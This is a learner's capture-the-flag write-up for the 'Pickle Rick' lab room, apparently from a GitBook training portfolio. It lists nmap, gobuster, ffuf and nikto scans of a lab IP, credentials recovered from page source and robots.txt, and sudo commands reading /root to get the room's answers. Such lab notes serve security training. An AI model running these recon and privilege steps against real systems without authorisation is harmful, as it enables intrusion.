Portfolio
  • whoami
  • Beginner
    • Bash and Linux Commands
    • Nmap
    • Tools
    • Metaspolit
    • Web Enumeration
    • What the Shell
    • Upload Vulnerabilities
    • Pickle Rick
    • Hashing-Crypt 101
    • John the Ripper
    • Encryption - Crypto 101
    • Windows Fundamentals 1
    • Active Directory
    • Blue Exploit
    • Common Privilege Escalation
    • Linux PrivEsc
    • Vulnversity
  • SOC
    • SIEM
    • Windows Event Logs
    • Skills Assessment
    • Get-WinEvent
    • Introduction to Threat Hunting
      • Threat Intelligence Fundamentals
      • Hunting For Stuxbot With The Elastic Stack
        • Skills Assesement
    • Introduction To Splunk & SPL
      • Splunk Applications
      • Intrusion Detection With Splunk (Real-world Scenario)
      • Detecting Attacker Behavior With Splunk Based On TTPs
  • Capture the Flags
    • CFT INE - Host & Network Penetration Testing: System-Host Based Attacks
    • Web Application Penetration Testing CTF
    • INE - The Metasploit Framework CTF
Powered by GitBook
On this page
  1. Beginner

Pickle Rick

PreviousUpload VulnerabilitiesNextHashing-Crypt 101

Last updated 6 months ago

subl Readme.md - creates a cread me file

s1: nmap scan: nmap -sC -sV -oN 10.10.221.23

visit webpage: 10.10.221.23

review source code, found username: R1ckRul3s

run gobuster scan to find directories: gobuster dir -u http://10.10.221.23/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.zip OR

Directory found:

/login.php (Status: 200) /assets (Status: 301) /portal.php (Status: 302) /robots.txt (Status: 200) /denied.php (Status: 302) /server-status (Status: 403) /clue.txt (Status: 200)

ffuf -u FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.php,.zip

perform a nikto scan: nikto -h ip_domain_name

results: "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).

/login.php: Admin login page/section found.

visiting robots.txt : the text Wubbalubbadubdub was found.

visit /login.php, use username: R1ckRul3s, password: Wubbalubbadubdub

use ls to list files

use less Sup3rS3cretPickl3Ingred.txt to reveal first ingredient.

less clue.txt: look around file system for other ingredient.

cd /home/rick; ls; pwd | result: second ingredients /home/rick

less cd/home/rick/"second ingredients" | result: 1 jerry tear

run sudo ls /root | result 3rd.txt

run sudo less /root/3rd.txt | result: 3rd ingredients: fleeb juice

http://10.10.221.23/
http://10.10.221.23/